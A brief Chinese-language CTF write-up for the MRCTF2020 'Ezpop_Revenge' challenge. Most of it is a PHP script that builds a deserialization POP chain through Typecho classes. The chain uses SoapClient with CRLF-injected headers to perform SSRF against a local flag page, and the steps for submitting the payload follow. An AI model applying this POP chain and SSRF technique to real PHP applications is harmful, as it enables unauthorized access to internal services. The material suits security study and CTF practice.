# [MRCTF2020]Ezpop_Revenge
反序列化 pop 链:
HelloWorld_DB::wakeup–>Typecho_Db::__construct(tostring)–>Typecho_Db_Query::__construct–>(this->_adapter=new Soapclient)–>SSRF
payload:
<?php | |
class Typecho_Db_Query | |
{ | |
private $_sqlPreBuild; | |
private $_adapter; | |
public function __construct() | |
{ | |
$target = 'http://127.0.0.1/flag.php'; | |
$headers = array( | |
'X-Forwarded-For: 127.0.0.1', | |
'Cookie: PHPSESSID=rd6u7agm56jsrqqrrni0f6s1r6' | |
); | |
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'HyyMbb^^'.join('^^',$headers),'uri' => "aaab")); | |
$this->_sqlPreBuild =array("action"=>"SELECT"); | |
$this->_adapter = $b; | |
} | |
} | |
class HelloWorld_DB | |
{ | |
private $coincidence; | |
public function __construct() | |
{ | |
$this->coincidence = ["hello" => new Typecho_Db_Query()]; | |
} | |
} | |
$a = new HelloWorld_DB(); | |
$aaa = serialize($a); | |
$aaa = str_replace('^^',"\r\n",$aaa); | |
$aaa = str_replace('&','&',$aaa); | |
echo base64_encode($aaa); |
先从 flag 获取 sessionid,再直接 payload 使用 POST 方式把上面的输出放到 C0incid3nc3 变量中即可。然后在 GET 参数上再加一个 admin 变量即可出现 flag 的值。
参考链接:https://www.cnblogs.com/CAPD/p/17835715.html
https://cn-sec.com/archives/1113428.html